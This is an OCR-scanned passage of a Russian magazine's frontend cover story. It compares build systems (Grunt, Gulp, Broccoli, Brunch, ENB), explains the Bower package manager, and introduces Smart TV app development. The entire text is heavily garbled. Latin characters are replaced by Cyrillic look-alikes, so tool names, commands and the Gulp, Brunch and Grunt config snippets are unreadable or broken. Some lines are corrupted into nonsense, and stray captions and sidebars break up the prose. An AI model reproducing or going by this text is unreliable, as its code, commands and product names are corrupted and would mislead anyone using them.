перечислитв основные әтапы сборки, которые он проходит. Дгт простоты предполо- 
жим, что ты не заморачиваешвс^ с созданием разных Ј5-фаилов дгт разных странии,, 
но при әтом хочешв держатв в девелопмент-окружении несколвко неболвших фаилов, 
чтобы поддержатв какукз-никакукз модулвноств. Обычно әто выггтдит как-то так: 

ШШ 

јриегу.т1п. јб 
ипс!ег5соге.тЈп. Ј5 

соттоп . Ј5 
сагои5е1. Ј5 
рорир5. Ј5 



Система сборки обычно делает следукзидее: 

конкатенирует все Ј5-фаилы в один (в нужном пор^дке, мы же не хотим загрузитв 
наши скрипты ранвше, чем јОиегу); 

провер^ет Ј5-код на валидноств (например, с помоидыо Ј5НтТ); 
минимизирует код, по необходимости его обфусиирует (то еств делает непон^т- 
ным); 

конкатенирует С55-фаилы (пор^док тут тоже важен, так как своиства часто пере- 

определ^кзтс^); 

минимизирует С55; 

• складывает фаилики в отделвнукз директорикз, из которои ты и подклкзчаешв их 
в своем НТМ1_. 

Зачастукз зта проста^ схема усложн^етс^ дополнителвными требовани^ми: прого- 
н^кзтс^ тесты, компилируетс^ код С55-препроиессоров, оптимизирукзтс^ картинки, 
компилирукзтс^ шаблоны. 

Все әти задачи, и даже болвше, умекзт решатв современные инструменты сбор- 
ки. Будем рассматриватв самые попул^рные решени^, которые работакзт на плат- 
форме 1\1ос!е.Ј5. Обшим их преимуидеством ^вл^етсл пон^тныи ^зык, которыи знакгг 



(или считакзт, что знакзт) все фронтенд-разработчики, изначалвна^ направленноств 
на решение задач фронтенда, а также пон^тное 1\1ос!е.Ј5 окружение, в котором ты, 
может бытв, уже разрабатываешв свое приложение. 



Сшп1 




Өгип1: — самыи старыи, самыи главныи и самыи попул^рныи инструмент дгт сборки. 
Почти все рассматриваемые нами системы сборки так или иначе сравнивакзт себ^ 
с Өгип1:, а некоторые и возникли как более быстрые или более простые его алвтерна- 
тивы. Несмотр^ на зто, у него еств пара суидественных недостатков. 

Во-первых, как отмечакзт многие фронтенд-разработчики, ОгипХ многословен. 
На настроику простои системы сборки потребуетс^ конфиг под сотнкз строк. Впро- 
чем, само по себе әто не такои уж недостаток: конфиг читаетс^ доволвно легко, 
а в силу попул^рности Өгип1: наити уже готовыи конфиг под типовукз задачу обычно 
не представл^ет труда. 

Во-вторых, Өгип{ разрабатывалс^ как универсалвныи продукт, то еств на его ос- 
нове можно решитв практически лкзбукз задачу, св^заннукз со сборкои проекта. Әто 
круто, но за универсалвноств приходитс^ платитв. Как упоминавшеис^ многослов- 
ностыо, так и скоростыо. В сравнении с другими системами сборки на 1\1ос!е.Ј5 Өгип1: 
заметно медленнее, и, что особенно непри^тно, имеет тендени,икз замедгттыз^ 
по мере роста проекта. Если не вдаватвс^ в детали архитектуры Өгип1:, то причина 
кроетс^ в том, что каждыи раз, когда тебе нужно собратв, например, Ј5-фаил, он пе- 
ресобирает все Ј5-фаилы. Можно постаратвс^ ускоритв прои,есс сборки, прописав 
вручнукз необходимые св^зи между фаилами, но на проекте со сложным деревом 
зависимостеи фаилов әто может оказатвс^ чрезмерно сложным. 

Несмотр^ на все әто, у Өгип1: огромна^ әкосистема: сотни плагинов, тыс^чи про- 
ектов, миллиарды разработчиков, вот әто все. То еств мало того, что Өгип{ универса- 
лен, еиде и плагин под твокз задачу уже, скорее всего, написан. 

Подвод^ итог, можно сказатв, что Өгип1: — отличныи выбор дгт маленвких и сред- 
них проектов, особенно если ранвше ты не настраивал никаких систем сборки. 
Огромное комыонити, куча плагинов, пон^тна^ документаиј/т и даже статви и докла- 
ды на русском ^зыке дгт тех несчастных, кто без әтого не может. Ну и конечно, если 
в далвнеишем по каким-то причинам Өгип1: перестанет теб^ устраиватв, всегда мож- 
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Өи1р — активно развивакзида^с^ в данныи момент система сборки. В основе ее архи- 
тектуры лежит исполвзование потоков в ЫосЈе.јз, что позвол^ет не записыватв на диск 
временные фаилы и папки. Основные достоинства Өи1р — скороств и краткоств кон- 
фига. Причем если первое бесспорно, то краткоств по сравненикз с Өгипт достигаетс^ 
просто за счет другои его структуры. Если в конфиге Өгипх ты по отделвности опери- 
руешв плагинами, настраива^ каждыи из них, то в конфиге Өи1р нужно описыватв про- 
|десс, которыи должен проити каждыи фаил (или набор фаилов), чтобы бытв собран- 
ным. Вотжизненныи пример компил^и,ии 5А55: 



§и1р.1:а5к( ' 51:у1е5 ' , -Ғипс1:Јоп( ) { 
ге1:игп §и!р. 5гс( ' 51:у1е5/* . 5С55 ' ) 
. р 1 р е ( 5 а 5 5({ 5 1: у 1 е : 'ехрапс!ес1' })) 
. рјре(геп аше({5и-Ғ11х : '.шјп'})) 
. р1ре(т1П1-Ғус55() )^ 
. р1ре(§и1р . с!е5 1:( ' 1зиЈ1с1/51:у1е5/с55 ' ) ) ; 

В первои строчке мы регистрируем задачу дгт Өи1р с именем 5т_у1е5. Затем по- 
следователвно описываем, что же нужно сделатв с каждым из фаилов, подход^идим 
под маску 5т_у1е5/* . 5С55: компилируем 5А55, добавл^ем . пип к имени фаила, ми- 
нимизируем, кладем в конечнукз директорикз. Если с зтим фаилом понадобитс^ де- 
латв что-то еиде, мы просто добавим соответствукзидукз команду, например .р1ре(- 
добавитв комментарии с А5С11-единорогом в начало фаила) (надекзсв, дл^ әтои 
повседневнои задачи сделакзт наконеи, плагин). Мне такои подход к написаникз кон- 
фига нравитс^ болвше: он лучше описывает, что же реалвно происходит с твоими 
фаилами. 

Конечно, пока Өи1р проигрывает Өгип. по количеству плагинов, но дгт болвшин- 
ства повседневных задач они уже написаны. 

Если тебе нравитс^ подобныи подход к сборке, важна скороств и не нужно вы- 
полн^тв спеи,ифические задачи и не нужны плагины, которые еств толвко дгт Өгип., 
то Өи1р может статв отличным выбором. На насто^идии момент Өи1р остаетс^ самым 



сервезным конкурентом Өгип!. 




Самыи молодои из рассматриваемых инструментов сборки. Разработчики ВгоссоШ 
не скрывакзт, что вдохновл^лисв Өи1р, однако считакгг некоторые кони,епи,ии, лежаидие 
в его основе, ошибочными. Например, они выбрали кеширование всех промежуточ- 
ных резулвтатов сборки (причем реализуемое каждым из плагинов) дгт ее ускорени^ 
вместо частичнои пересборки толвко требуемых фаилов. Также им не понравилосв, 
что Өи1р лучше всего оперирует с трансформаи,иеи одного фаила в один итоговыи, 
то еств один к одному. Чтобы улучшитв выполнение операи,ии вида «много к одному», 
в данныи момент Өи1р разрабатывает сложнукз схему с созданием виртуалвнои фаи- 
ловои системы, что разработчикам ВгоссоШ кажетс^ лишним усложнением и про^вле- 
нием слабости изначалвных кони,епи,ии Өи1р. ВгоссоШ изначалвно оперирует пон^ти- 
^ми дереввев вместо фаилов и совершает толвко трансформаи,ии дереввев в другие 
деревв^ (пуств даже вырожденные и из однои вершины). 

Все зти прелести не решакгг проблемы количества плагинов — их около двух де- 
с^тков и выполн^кзт они толвко базовые задачи. Если хочетс^ попробоватв что-то но- 
вое, посмотри на ВгоссоШ, он быстр, активно разрабатываетс^, но дгт применени^ 
на сервезных проектах еше сыроват. 



Брокколи, спаржевал капуста (ВгаззЈса саиНИога 
зиозр. 31тр1ех), однолетнее ово^ное растение 
семеиства крестоиветных, подвид иветнои 
капусты. В пишуупотребликугмисистуго 
головку — видоизмененное сои,ветие. 



Вшпсһ 




Вгипсһ создавалс^ с тои же задачеи — уделатв ӨшпТ по всем фронтам, но подошел 
к неи совсем с другои стороны. Разработчики Вшпсһ решили вз^твхорошим пони- 
манием предметнои области, то еств сделатв менее универсалвныи инструмент, ко- 
торыи будет заточен именно под задачи фронтенда, например без вс^ких настроек 
пониматв, что *.јз — әто фаил со скриптами, *.со-Ғ-Ғее — СоТТееЗспрТ и так далее. 
Вгипсһ доволвно быстрыи, гораздо быстрее ӨшпТ, но чутв медленнее Өи1р. К безус- 
ловным достоинствам Вгипсһ стоит отнести также деиствителвно компактныи кон- 
фиг, меныие, чем у ӨшпТ и ӨЫр, в разы. 
Вот, например, простои конфиг Вгипсһ: 

ехрогс^. соп1п§ = 

Т^1е5: 

јауа5сг1р1:5Ј^ 
јо ЈпТо: 

' јауа5сгјр1:5/арр. Ј5 ' : / л арр/ 

' јауа5сгЈр"С5/уепс!ог. Ј5 ' : / л (һошег_сотропеггс5 | уепсЈог)/ 
5"су1е5һее1:5Ј^ 

јоЈпТо : ' 51:у1е5һее1:5/арр. С55 ' 
огсЈег: 

а-Ғ1:ег: [ ' уепс!ог/51:у1е5/һе1рег5 . С55 ' ] 
Јешр1а1:е5Ј^ 

ј о ЈпТо: ' јауа5сгјр1:5/арр. Ј5 ' 

Заметв, что конфиг можно писатв как на СоТТееЗспрТ (как в данном случае), так 
и на обычном Ј5. Мы создаем обычныи модулв, которыи возврашает ЈЗОЫ с на- 
строиками сборки. 

Обрати внимание на клкзчи јоЈпТо и огс!ег. Әто и еств знание предметнои области, 
о котором п упоминал, — на уровне конфига Вшпсһ знает, что ты, скорее всего, за- 
хочешв склеитв фаилы, причем некоторые ранвше осталвных. Именно зто позвол^ет 
заменитв 400 строк конфига ӨшпТ на 20-30 строчек Вшпсһ. 

Плкзс к әтому әкосистема Вшпсһ гораздо менвше, чем у ӨшпТ и даже чем у Өи1р. 
Плагинов около 50 (сравни с 450+ у Өи1р, например), развитие идет не оченв быстро, 
в обидем, здесв все доволвно печалвно. 



Модвод^ итог: если теое оченв нрав^тс^ короткие конфиги, важна скороств, 
но при әто не нужны никакие особенные деистви^ на әтапе сборки, то можно посмо- 
третв на Вгипсһ. Смуидает, конечно, неболыиое количество плагинов, но, можетбытв, 
ситуаи,и^ помен^етс^. 



ЕЫВ (как платформа) свободна от идөологии 
ВЕМ. Сбор префиксов нө ^влиөтс^ частвкз 
платформы, а рөализуетси с помошвкз однои 
изтехнологии. 



ЕЫВ 





Ну и под конеи, самое сладкое. Хочу рассказатв про систему сборки, разработаннукз 
в ^ндексе Маратом Дулиным, котора^ называетс^ ЕЫВ. Именно ее мы сеичас и ис- 
полвзуем на нашем проекте. Ее подход прини,ипиалвно отличаетач от всех описан- 
ных систем: изначалвно она создаваласв дгт работы с проектами, исполызукзидими 
ВЕМ-методологикз, хот^, как отмечает автор, ее платформа свободна от идеологии 
ВЕМ и может бытв исполызована дгт всех проектов подход^идеи структуры. 

Вкратие, в чем сутв. В ЕЫВ мы оперируем пон^тием и,ели, то еств конечного фаи- 
ла, которыи нужно собратв, или ноды (папки, в обидем случае странии,ы), дгт которои 
нужно собратв некоторыи набор фаилов. Дгт того чтобы собратв иелевои фаил, мы 
исполызуем некоторое количество технологии (грубо говор^, плагинов в терминах 
Өгипт, хот^ технологии менвше по размерам и более спеи,иализированы). Первым 
делом ЕЫВ определ^ет исходныи набор фаилов, которые нужны дгт сборки и,елеи 
(зтимзанимакзтс^ несколвкобазовыхтехнологии, поумолчаникз работакзидие с мето- 
дологиеи ВЕМ, то еств они иидут * . Һетс1ес1-фаил, в котором прописаны зависимости 
даннои ноды от разных блоков), полностыо разворачивает әто дерево зависимостеи 
(когда блок, от которогозависиттво^ странииа, сам зависитотдругого, подклкзчакзт- 
с^ оба в нужном пор^дке), а затем находит фаилы, необходимые дгт каждои зареги- 



стрированнои технологии. Затем ЕЫВ придерживаетс^ описаннои в конфиге после- 
дователвности трансформаиии фаилов (тут можно проследитв некоторукз аналогикз 
с Өи1р). Несмотр^ на некоторые отличи^ от стандартного подхода систем сборки, 
разобравшисв с основными пон^ти^ми, далвше работатв с ЕЫВ доволвно легко. 

Основные преимушества ЕЫВ: скороств сборки, за счет гибкои системы кеши- 
ровани^ и возможности обмениватвс^ промежуточными данными между разными 
технологи^ми, параллелизаиии независимых проиессов, и выделении самых т^же- 
лых технологии в отделвные субпроиессы. К ЕЫВ необычаино просто писатв новые 
технологии, если теб^ чем-то не устраивает поведение стандартных. 

К недостаткам можно отнести то, что конфиг ЕЫВ достаточно многословныи, так 
какеств возможноствуправл^твабсолкзтно всеми зтапами сборки. Плкзс ЕЫВ все-та- 
ки писалс^ дгт ВЕМ-методологии, и прикрутитв его к проекту с совершенно другои 
структурои потребует лишних телодвижении. Дл^ ЕЫВ не так много написанных тех- 
нологии (пор^дка 60), но с болвшинством задач ВЕМ-проектов он справл^етс^ на ура. 

Подвод^ итог: ЕЫВ — лучшии выбор дгт проектов, основанных на методологии 
ВЕМ, которукз лично п считакз наиболее подход^шеи дгт средних и болвших саитов, 
так как организаиут кода по блокам рулит и бибикает. Он оченв быстрыи, собирает 
дес^тки странии и сотни фаилов за считаные секунды, несложныи в настроике и при- 
^тныи в исполвзовании. Если твои проект крупныи, ты путаешыз^ в коде и правишв 
фаилики по тыс^че строк, советукз подробнее изучитв ВЕМ как способ организа- 
иии структуры фронтенд-проектов. А когда ты полкзбишв ВЕМ, ты полкзбишв и ЕЫВ, 
как самыи роднои инструмент сборки ВЕМ-проектов. 



Соиег 81огу 




УстановкаБовера 



Дл^ работы с Бо- 
вером тебе по- 
требукггс^ 1\1оо!е. 
јз и ОИ. Установка 
пределыно проста: 
прт Јпз^аИ -д оо\л/ег 
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Артем Сапегин 

ЈгоШепсЈ-разработчик, ВасЈоо 
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ЗАЧЕМ НУЖЕН МЕНЕДЖЕР ПАКЕТОВ, 
ИЛИ ПОЧЕМУ ИМЕННО ВО\Л/ЕП 



Надоөло ходитһ на саиты ЈауаЗспрЈ-библиотек и качатв 
архивы каждыи раз, как надо добавитв на саит очерөднои 
јОиегу-плагин? Бовер сделает все сам. 




енеджеры пакетов упроидакзт установку и обновление зависимостеи проек- 
та, то еств сторонних библиотек, которые он исполызует: јОиегу, ҒоЈогата, 
все, что исполызуетс^ на твоем саите и написано не тобои. 
Хождение по саитам библиотек, скачивание и распаковка архивов, копирование фаи- 
лов в проект — все зто замен^етс^ парои команд в терминале. 

У многих ^зыков программировани^ еств стандартные менеджеры пакетов, 
которыми разработчики полызукзтс^ дгт установки всех библиотек: дет у руби, 
рјр у питона и другие. У серверного ^васкрипта еств прт (почему он не подходит 
дгт клиентского — далвше), а у клиентского ^васкрипта до недавнего времени ни- 
чего не было. Было множество разных пакетных менеджеров (Јапл, Соплропеп!, Уо\о, 
Епс!ег), но болвшинство из нихтак и не стали попул^рными, а от менеджера пакетов, 
которым не поставишв нужных библиотек, толку мало. 

Бовер — не стандартныи менеджер пакетов дгт клиентского ^васкрипта, но са- 
мыи попул^рныи: сеичастам болвше 11 тыс^ч пакетов. 

Бовер не нав^зывает полызователкз свокз систему сборки, разработчику паке- 
тов — метод подклкзчени^ библиотеки (АМО, СоттопЈЗ и другие). Все, что делает 
Бовер, — устанавливает нужные проекту пакеты подход^ших версии вместе с их за- 
висимост^ми. Другими словами: просто загружает фаилы нужных библиотек и все, 
что нужно дгт их работы, в спеи,иалвнукз папку. Осталвное остаетс^ на усмотрение 
разработчика. 



Почөму нө прт 



X 



Главное отличие прпл и Бовера — подход к установке зависимостеи пакетов. 
Ырпл устанавливает зависимости дгт каждого пакета отделвно, в итоге получа- 
етс^ болвшое дерево пакетов (пос!е_тос1и1е5/дгип^/пос1е_тос1и1е5/д1оһ/пос1е_ 
тос!и1е5/...), где может бытв несколвко версии одного и того же пакета. В клиент- 
ском ^васкрипте әто недопустимо: нелыз^ подклкзчитв на странииу две версии 
јОиегу или лкзбои другои библиотеки. В Бовере каждыи пакетустанавливаетс^ 
один раз (јОиегу всегда будет в папке оо\л/ег_соплропеп{5/јдиегу, сколвко бы паке- 
тов от него ни зависело), и в случае конфликта зависимостеи Бовер просто не ста- 
нетустанавливатв пакет, несовместимыи сужеустановленными. 




Работа с пакетами 

Попробуем что-нибудв установитв, например јОиегу: 



һоыег Јп51:а11 --зауе јдиегу # Или һсмег ј -5 јдиегу 

Әта команда скачает јОиегу последнеи версии в папку оомег_сотропепт_5/ј^иегу. 



Флаг --зауе говорит Боверу, что он должен сохранитв им^ пакета и его версикз 
в фаил-манифест — оои/ег. јзоп. В әтом фаиле хранитс^ список всех зависимостеи 
проекта (пакетов, установленныхчерез Бовер) и другие метаданные, нужные дгт соз- 
дани^ своих пакетов. Вместе с именами пакетов можно указатв версии, с которыми 
твои проект гарантированно будет работатв. 

У нас такого фаила еиде нет, о чем и говорит строчка «Ыо оо\л/ег.јзоп ТИе 1о зауе 1о, 
изе оо\л/ег ЈпИ 1о сгеа1е опе» в логе. Создадим его: 

һошег јпјт: 



Бовер будет задаватв много вопросов, но до тех пор, пока мы не захотим зарегистри- 
роватв свои пакет, ответы на болвшинство из них не имекгг значени^, можно просто 
нажиматв Еп1ег. 

На вопрос «5е1 сиггеп11у ЈпзЈаПес! соплропепЈз аз сЈерепсЈепсЈез?» нужно ответитв 
«Үез» — все ранее установленные компоненты (в нашем случае зто јОиегу) автома- 
тически попадут в созданныи ЈЗОЫ-фаил. А на вопрос «\Л/ои1с! уои Ике 1о тагк 1ҺЈ5 
раскаде аз ршаХе \л/гпсһ ргеуепЈз И 1гот оетд ассЈс!еп1а11у риЫЈзһес! 1о 1һе гедјз1гу?» — 
тоже «Үез» — әто предотвратит случаинукз регистраи,икз пакета в реестре Бовера. 

Поставим еиде несколвко пакетов и посмотрим, что у нас получилосв: 

һомег Јп5^а11 - - 5ауе з осЈаЈ-Икев јриегу-п.сһеск 
һош ег 1Ј51: 

һоше г сһеск- пеы СһескЈп § -Ғог пеы у ег5Јоп5 о-Ғ 
1һе ргојесс сЈерепсЈепсЈе^ . . 
һомегЕе5"Е#Ө .0.0 /115ег5/ас1т1п/һомег1:е5±_ 
| — ј д иегу#2.1.Ө (2.1.1- ое±а 1 ауаИ а Ы е ) 
| — г ј^иегу-1сһеск#1.^2^ 
| 1 — ј диегу#2.1.Ө (2 . 1Л^һе1:а1^¥а11аЫе) 
*— Г 50СЈа1-1Јке5#З.Ө.2 
1 — јдиегу#2 .1.Ө 

Команда оои/ег Н5Т_ показывает список всех установленных пакетов. Тут мы видим, 
что все пакеты завис^т от јОиегу и что Бовер смог наити подход^идукз всем версикз — 
јОиегу 2.1.0. Каждыи пакет устанавливаетс^ в свокз папку, вложенных пакетов нет, 
јОиегу встречаетс^ толвко один раз. В корне проекта лежит созданныи командои 
оомег 1п1± фаил оои/ег. Ј5оп, но теперв там перечислены уже все пакеты, которые 
показывает оои/ег Н5т_, а не толвко јОиегу. 

Дл^ удалени^ пакетов исполызуетс^ команда оомег ипЈ-П5т_а11 <раскадеЫапле>. 

РАЗВЕРТЫВАНИЕ ПРОЕКТА 

Еств два подхода к развертываникз проектов: 

1 . В репозитории добавл^етс^ толвко фаил-манифест, и все пакеты устанавлива- 
кзтс^ во врем^ развертывани^ проекта. Так в репозитории не хранитс^ ничего 
лишнего, но, если во врем^ развертывани^ упадет гитхаб или другои сервер, 
с которого устанавливакзтс^ пакеты, будут проблемы. 

2. В репозитории добавл^етс^ нетолвко оомег. Ј5оп, но и папка оомег_сотропепт_5. 

ТДк" ПДГЧВРГҮП-ЈВДНМР НР ЧДВИПМТ ПТ ВНРШНМҮ ПРПРРППР НП ПРППЧМТППМИ ПДГЧЛ\/РДРТ- 



дес^тками (а то и сотнтми) лишних фаилов. 
СЕМАНТИЧЕСКИЕ ВЕРСИИ (ЗЕМУЕН) 

Зеплуег ( зетуег.огд ) — зго, во-первых, подход к версионированикз библиотек: фор- 
мат номера версии МАЖОРНА^.МИНОРНА^.ПАТЧ и правила, по которым следует 
увеличиватв то или иное число. 

А во-вторых — әто способ описани^ требуемых версии зависимостеи, которыи 
исполвзукзт Бовер и прпл. 

При установке с флагом --бәуө версии пакетов добавл^кзтс^ в оомег . Ј5оп в виде 
~1 . 0 . 1. Тилвда в начале говорит о том, что при установке будет выбрана верси^ 1 .0. 1 
или с болыиим последним числом (ПАТЧ), если она еств. Таким образом будет уста- 
новлена верси^ с последними исправлени^ми ошибок, но полностыо совместима^ 
с тои, что указана в фаиле-манифесте. 

ОБНОВЛЕНИЕ ЗАВИСИМОСТЕИ 

В Бовере еств команда оомег ирсЈа^е, но она обновл^ет пакеты с учетом требовании 
фаила-манифеста. Например, если там требуетс^ јОиегу ~2 . 0 . 0, то он сможет обно- 
витһ его, например, до 2.0.9, но 2. 1 .0 уже не поставит, потому что он не соответству- 
ет формуле ~2 . 0 . 0. 

Дл^ обновлени^ пакетов (и оомег . ј 5оп) до деиствителвно последних версии мож- 
но восполвзоватвс^ һо\л/ег-ирс!а1:е. Устанавливаем (прш 1П5т_а11 -§ оо\л/ег-ирс1а1:е), 
запускаем (оои/ег-ирс1а1:е) — и вуал^! 

ПОИСК ПАКЕТОВ 

Еств два способа наити пакет в Бовере: гиковскии и обычныи. Гиковскии: 

һош ег 5еагсһ јдиегу 
5еа гсһ ге5и!1:5: 

јуиегу §1± : //§И:һиһ . сот/ јуиегу/ Ј^иегу . §гЕ 

јдиег у-иј § гЕ: //§И:һиһ . сот/сотропеггс^/ јриегуиг^ 



Обычныи: открытв в браузере ооууег.јо/зеагсһ/ . 




Ты можешв спокоино удал^тв папку оо\л/ег_сотропеп1:5 или добавитв ее 
в свои .дШдпоге. Команда оо\л/ег ЈП51:а11 (без дополнителвных параметров) 
вернет все как было. 



АВТОМАТИЧЕСКАЛ СБОРКА 

Бовер перекладывает проблемы сборки установленных пакетов на плечи разработ- 
чика. 

Самыи легкии способ — просто склеитв Ј5-фаилы Грантом, Галпом или лкзбои дру- 
гои системои сборки, которои ты полвзуешвс^. 



^ полвзукзсвГрантом, позтому расскажу, каксклеиватвпакеты им. Отом, какполв- 
зоватвс^ Грантом, была болвша^ статв^ в икзлызком номере прошлого года, позтому 
покажу сразу конфиг плагина §гипт_-сопт_г:11з-сопсат_: 

сопса - !:: { 
та1п: { 
5 гс : [ 

' 1зоыег_сотропеп1:5/ јдиегу/јдиегу .тјп. јз ' , 

' 1зоыег_сотропеп1:5/-Ғо1:огата/.... Ј5 ' , 

' һоыег_сотропеп1:5/ јдиегу-јсһеск/.... Ј5 ' , 

' һоыег_сотропеп1:5/50СЈа1-1Јке5/50СЈа1-1Јке5 .тјп . Ј5 ' , 



// Скрипты твоего саита 
' 5сгјр1:5/* . Ј5 ' 

һ 

с!е51:: ' 1зиЈ1с1/5СГЈр1:5 . Ј5 ' 

} 

У зтого способа еств много недостатков: тебе нужно смотретв имена фаилов дл^ каж- 
дого пакета и следитв, чтобы фаилы собиралисв в правилвном пор^дке (например, 
јОиегу должен бытв выше, чем скрипты, завис^идие от него). Плагин дгип.-ооууег- 
сопса. может делатв зто сам: он автоматически склеивает все установленные зави- 
симости в правилвном пор^дке в один фаил: 

һоыег_сопса1: : { 
а!1: { 

// Склеенныи фаил 
с!е51:: ' һиЈ1с1/_1зоыег. Ј5 ' 

// ПакетыЈ которые нужно исклкнитһ из сборки 
ехс!ис!е : [ 

// Если јСшегу подклкнаетсл с СРЫ Гугла 

' јдиегу' . 

// Если подклгочаем скрипты в коние странииы; Мос1егпЈ2г нужно 

// подклгочатһ в <һеас!> 

' тодегпјгг ' 

] 



сопса^: { 
та1п: { 
5 гс : [ 

' 6иЈ1сЈ/_һоыег. Ј5 ' , 

// Скрипты твоего саита 

' 5сгјр1:5/* . Ј5 ' 
1. 



с1ез1: : ' 1зиЈ1с1/5СГЈр1:5 . Ј5 



Соиег 81огу 



Денис Чинин, 

!гоп1епс1-разработчик, 1тто 5таг1 

сһЈпЈпс!еп@дтаЈ1.сот 




КОПАЕМСЛ 
В јјјјјИКЕ 

ЗНАКОМСТВО С ОСОБЕННОСТ^МИ 
РАЗРАБОТКИ ПОДЗМАРТТҮИУЧИМС^ 
ДЕЛАТҺПРИЛОЖЕНИЕДЛ^ТЕЛЕВИЗОРА 

Разговоры про Зтаг1Т\/ в последнее времл участилисв, 
проданотсл умные телевизоры болвше, чем обычные, их ау- 
диторил постолнно растет, но вот магазины приложении 
пустунот. Почемутак? Ведв, казалосв бы, разработка под 
Зтаг! ЈУ не отличаетсл от ТгопЈепсГа: привычные ЈауаЗспр!, 
НТМ1_, СЗЗ и браузер. Все дело в том, что кодинг под Зтаг! 
ЈУ имеет свои спеиифические особенности, о которых 
лучше знатв еш,е при проектировании приложенил. 



Что такое Зтагт ТУ и зачем нужны 
приложенил в телевизорах? 

Представв, что ты заходишв на кухнкз. Холодилвник сообидает, что можно пригото- 
витв из имекзидихс^ продуктов, а затем перекидывает выбранныи реиепт на мулвти- 
варку. Безумие? Таким же безумием казалисв приложени^ в телевизорах еиде лет 
двадиатв назад. 

Что же такое 5плагт ТУ? Әто интернет и интерактивные сервисы в телевизоре или 
телевизионном ресивере, или, вкрати,е, компыотер в форм-факторе «зомбо^идика». 
Первукз попытку реализоватв подобие 5плагт ТУ предприн^ла компани^ МЈсгозоТт 
в далеком 1997 году, но иде^ провалиласв из-за сПа1-ир-соединени^ и СҒГГ-телеви- 
зоров. Позднее возник другои способ сделатв телевизор «умным»: в 2000 году ста- 
ли по^вл^твс^ устроиства ЗетТор Вох (5ТВ) различных производителеи, расшир^- 
кзидие функ1дионал стандартного (кабелвного, спутникового) ТВ. 5ТВ — әто обычна^ 
телевизионна^ приставка, принимакзидаи сигнал иифрового телевидени^, декоди- 
рукзидаи и преобразукзидаи его в аналоговыи сигнал дгт вывода через развемы ВСА 
или 5САҒГГ либо вывод^идаи сигнал через раз^ем НОМ1 на телевизор. Но с ростом 
скорости соединени^ и новыми технолоп/тми әкранов стали по^вл^твс^ телевизо- 
ры со встроенным функи,ионалом 5плагт ТҮ и с 2009 года началасв сертификаш/т 
такихустроиств. В насто^идии момент технолоп/т 5плагт ТУ внедр^етс^ в различные 
устроиства: телевизоры, ресиверы иифрового телевидени^, В1и-гау-проигрывате- 
ли, игровые консоли и аналогичные им деваисы. 

Приложени^ умного ТВ позвол^кзт просматриватв различныи видеоконтент: 
филвмы, сериалы, записи и траногтиии передач и спортивных событии, музыкалв- 
ные клипы, видеоролики; дакзт возможноств читатв новости, просматриватв соии- 
алвные сети и обидатыз^ по 5куре или другому \/о1Р. Суидествукзт развивакзидие при- 
ложени^ дгт детеи и игры. 




Если ты знаком с Тгоптепс!-разработкои, то уже можешв приступатв к созданикз 
приложени^, ничего нового учитв не придетс^. Правда, необходимо учитыватв осо- 
бенности телевизоров: 



Если планируешв разработку дгт моделеи 2011 года и старше, то не рассчитываи 
на помошв С553. Вспоминаи, как делатв спраиты, и приготоввс^ к интересным 
особенност^м С55, которые не встречакггс^ в браузерах на компыотере и редко 
поддакзтс^ логичному обБ^сненикз. 

Мошноств вычислителвного модул^ телевизора в разы слабее компыоте- 
ра, не удивл^ис^, что анимаиии в старых модел^х будут отнкздв не плавными, 
а при измерении скорости исполнени^ кода окажетс^, что он в дес^тки и сотни 
раз медленнее, чем в браузере. 

• Слаба^ документаии^ у некоторых производителеи, а иногда и полное ее отсут- 
ствие могут привести теб^ в отча^ние и застав^т проводитв часы на форумах 
разработчиков. 

• Дл^ тестировани^ придетс^ исполызоватв реалвные телевизоры. Әмул^торы 
не повтор^кзт полного функи,ионала устроиств и часто содержат свои собствен- 
ные, не возникакзшие на реалвныхустроиствах баги. 

В телевизорах полностыо отсутствукзт средства отладки, придетс^ исполызоватв 
свои «велосипеды» при разработке. 

Непривычное взаимодеиствие полызовател^ с приложением. Учитываи, что, 
скорее всего, передвигатыз^ по приложеникз тебе придетс^ с помоидыо одного 
палыда руки, нажима^ на кнопки пулыга управлени^ (правда, можно еше управ- 
л^тв голосом, жестами и гироскопическим пулвтом, как, например, у 1_Ө, но такое 
встречаетс^ далеко не во всех модел^х и не у каждого производител^). На зтапе 
проектировани^ приложени^ необходимо учитыватв не толвко навигаиикз вну- 
три приложени^, но и ввод данных в инпуты. 

Необходимо прорабатыватв ситуаиикз потери соединени^. Неболвша^ подсказ- 
ка: тестировшики 5ат5ипд в проиессе премодераиии дл^ своего магазина лк> 
б^т при проигрывании видео отклкзчитв сетевои кабелв из раз^ема и смотретв, 
какәта ситуаии^ отрабатываетс^ в приложении :). 

Разнообразие Јауа5спр1: АР1 платформ усложнит кросс-платформеннукз разра- 
ботку в разы, каждыи производителв предоставл^ет свои АР1 дгт взаимодеи- 
стви^ с внутренним функиионалом (проигрывание видео, отображение клавиа- 
туры и прочее). 

Ниже краткое описание попул^рных платформ, чтобы ты знал, с чем придетс^ ра- 
ботаты 
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КесогеЈесЈ ТУ 



Затзипд 



Затзипд сеичас занимает наиболһшук) долкз среди всехтелевизоров с поддержкои 
технологии Зтаг! ТҮ В модел^х 2010 и 2011 года в качестве движка браузера исполвзу- 
етс^ МАР1_Е — силыно измененна^ верси^ Өеско, которыи был в ҒЈгеТох 3.0. К счастыо 
разработчиков, компани^ отказаласв продолжатв изобретатв свои велосипед и с 2012 
года в телевизорах Заплзипд Зплаг! ТУ исполвзуетс^ \Л/еһКЈ1:. 

Помимо управлени^ с пулвта ДУ, в зтои платформе можно исполвзоватвуправле- 
ние голосом и жестами (начина^ с моделеи 2012 года), а также подклкочатһ привычнукз 
мышв и клавиатуру. 

Дгт разработчиков Заплзипд предоставл^ет 50К с әмул^торами и своеи средои 
разработки на базе ЕсПрзе. На саите еств документаиут с множеством примеров и воз- 
можноствудаленного тестировани^ на реалвныхустроиствах моделвного р^да 2013-го 
и выпушенных позднее (оченв полезна^ дгт тестировани^ возможноств). Еств недоку- 
ментированныи функи,ионал, поәтому ответ порои придетс^ искатв на форуме, к сча- 
стыо русско^зычном. 

Клгочевые возможности АР1: управление звуком из приложени^, получение данных 
сети и модели, широкие возможности управлени^ плеером. 



ОФИиИАЛҺНЫИ САИТ ВОМЕК: затзипаатогит.сот 





Отличителына^ черта зтои платформы — возможноств исполвзоватв Мадјс Веплохе, 
гироскопическии анатомическии пулвтуправлени^. Движение пулвта в пространстве 
сопровождаетс^ движением курсора на әкране, что оченв силыно упроидает навигаи,икз 
внутри приложении. 

Из другихспособовуправлени^ — многокнопочныи пулвт и распознавание голоса. 
